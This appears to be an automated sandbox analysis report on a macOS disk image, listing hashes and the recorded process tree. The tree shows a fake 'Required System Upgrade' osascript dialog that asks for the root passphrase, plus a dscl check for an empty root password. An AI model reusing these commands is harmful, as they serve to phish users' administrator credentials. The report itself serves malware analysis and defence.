Overview

overview

1

Static

static

1

8873ae9ef1...JC.dmg

macos-10.15-amd64

1

Analysis

  • max time kernel
    49s
  • max time network
    157s
  • platform
    macos-10.15_amd64
  • resource
    macos-20230831-en
  • resource tags

    arch:amd64arch:i386image:macos-20230831-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    04/10/2023, 18:06

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    8873ae9ef12bb5542d743116136e811789bbdc28b8cbc492cd55cba1b6e153ba_JC.dmg

  • Size

    500KB

  • MD5

    bd7939eb15ce394225c9095d5f25ab9c

  • SHA1

    5909d90239475d29d1045f38b98857b40a059d84

  • SHA256

    8873ae9ef12bb5542d743116136e811789bbdc28b8cbc492cd55cba1b6e153ba

  • SHA512

    3ec7f55414796615e2e1bcd8f26732439b5faddb29f79dd4acd7dab3bbf1df6be97a4859f12ace7c94f5fee918128f5500961a9470a51df57ffeacf9ffaaf439

  • SSDEEP

    12288:WXoJfAycbXpNU0bamorfNq4dYU1Uu65dRvwB1na+XyEfrWEN7wr:U9hbjtbrorFq0YUKLaXn3yhE

Score
1/10

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
    1⤵
      PID:557
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
      1⤵
        PID:557
      • /bin/bash
        sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
        1⤵
          PID:557
        • /usr/bin/sudo
          sudo /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
          1⤵
            PID:557
          • /usr/bin/sudo
            sudo /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
            1⤵
              PID:557
              • /bin/zsh
                /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
                2⤵
                  PID:558
                • /bin/zsh
                  /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
                  2⤵
                    PID:558
                  • /usr/bin/open
                    open /Volumes/source_folder/AppleApp.app
                    2⤵
                      PID:558
                    • /usr/bin/open
                      open /Volumes/source_folder/AppleApp.app
                      2⤵
                        PID:558
                    • /usr/libexec/xpcproxy
                      xpcproxy com.apple.xpc.launchd.oneshot.0x10000002.AppleApp
                      1⤵
                        PID:559
                      • /Volumes/source_folder/AppleApp.app/Contents/MacOS/AppleApp
                        /Volumes/source_folder/AppleApp.app/Contents/MacOS/AppleApp -psn_0_167977
                        1⤵
                          PID:559
                        • /usr/libexec/xpcproxy
                          xpcproxy com.apple.bird
                          1⤵
                            PID:561
                          • /System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
                            /System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
                            1⤵
                              PID:561
                            • /bin/sh
                              sh -c "dscl . authonly \"root\" \"\""
                              1⤵
                                PID:563
                              • /bin/bash
                                sh -c "dscl . authonly \"root\" \"\""
                                1⤵
                                  PID:563
                                • /bin/bash
                                  sh -c "dscl . authonly \"root\" \"\""
                                  1⤵
                                    PID:563
                                  • /usr/bin/dscl
                                    dscl . authonly root
                                    1⤵
                                      PID:563
                                    • /usr/bin/dscl
                                      dscl . authonly root
                                      1⤵
                                        PID:563
                                      • /bin/sh
                                        sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
                                        1⤵
                                          PID:564
                                        • /bin/bash
                                          sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
                                          1⤵
                                            PID:564
                                          • /bin/bash
                                            sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
                                            1⤵
                                              PID:564
                                            • /usr/bin/osascript
                                              osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
                                              1⤵
                                                PID:564
                                              • /usr/bin/osascript
                                                osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
                                                1⤵
                                                  PID:564
                                                • /usr/libexec/xpcproxy
                                                  xpcproxy com.apple.audio.systemsoundserverd
                                                  1⤵
                                                    PID:565
                                                  • /usr/sbin/systemsoundserverd
                                                    /usr/sbin/systemsoundserverd
                                                    1⤵
                                                      PID:565
                                                    • /usr/libexec/xpcproxy
                                                      xpcproxy com.apple.pbs
                                                      1⤵
                                                        PID:566
                                                      • /System/Library/CoreServices/pbs
                                                        /System/Library/CoreServices/pbs
                                                        1⤵
                                                          PID:566
                                                        • /usr/libexec/xpcproxy
                                                          xpcproxy com.apple.audio.AudioComponentRegistrar
                                                          1⤵
                                                            PID:567
                                                          • /System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
                                                            /System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
                                                            1⤵
                                                              PID:567

                                                            Network

                                                                  MITRE ATT&CK Matrix

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • /Users/run/Library/Caches/.dat.nosync0236.pVUPT6
                                                                    Filesize

                                                                    12KB

                                                                    MD5

                                                                    f720016d8bd8cc724ec2f4fd957b4a78

                                                                    SHA1

                                                                    3ef8da6731cc8225eb5bfa0ac1d59b17020119d6

                                                                    SHA256

                                                                    d932dfbbf853a70c6173a3d2392381eaa435671c6473c80d7f3f6dab3c50f301

                                                                    SHA512

                                                                    1a3e5728452afea9e510b771b60c3db127b34b372a4135820fff57b53e3341c8f79a355e221b9f5b933618fe28c2f187f509e40c8a1421d2e0cc1fff9d9f7cfc

                                                                    Download Submit